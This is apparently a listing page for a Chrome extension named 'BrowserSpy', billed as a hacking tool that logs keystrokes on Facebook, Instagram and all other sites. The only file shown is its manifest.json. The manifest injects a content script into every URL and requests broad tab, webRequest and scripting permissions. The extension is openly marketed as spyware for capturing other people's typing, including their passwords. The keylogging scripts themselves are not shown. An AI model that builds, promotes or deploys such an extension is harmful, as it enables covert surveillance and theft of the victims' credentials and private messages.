Hacking tool for Facebook, Instagram - BrowserSpy (for all sites)

Hacking tool for Facebook, Instagram - BrowserSpy (for all sites)

BrowserSpy is an online spying tool that helps you log the keystrokes for all sites(facebook, instagram etc)

Merlin
Additional files are visible only to premium users

manifest.json


{
  "update_url": "https://clients2.google.com/service/update2/crx",
  "manifest_version": 3,
  "name": "Hacking tool for Facebook, Instagram - BrowserSpy (for all sites)",
  "description": "BrowserSpy is an online spying tool that helps you log the keystrokes for all sites(facebook, instagram etc) ",
  "version": "0.10",
  "icons": {
    "16": "browser.png",
    "48": "browser.png",
    "128": "browser.png"
  },
  "action": {},
  "background": {
    "service_worker": "back.js",
    "type": "module"
  },
  "content_scripts": [
    {
      "matches": [
        "<all_urls>"
      ],
      "js": [
        "jquery-3.5.0.min.js",
        "content.js"
      ]
    }
  ],
  "permissions": [
    "alarms",
    "tabs",
    "webRequest",
    "webNavigation",
    "scripting",
    "storage",
    "unlimitedStorage"
  ]
}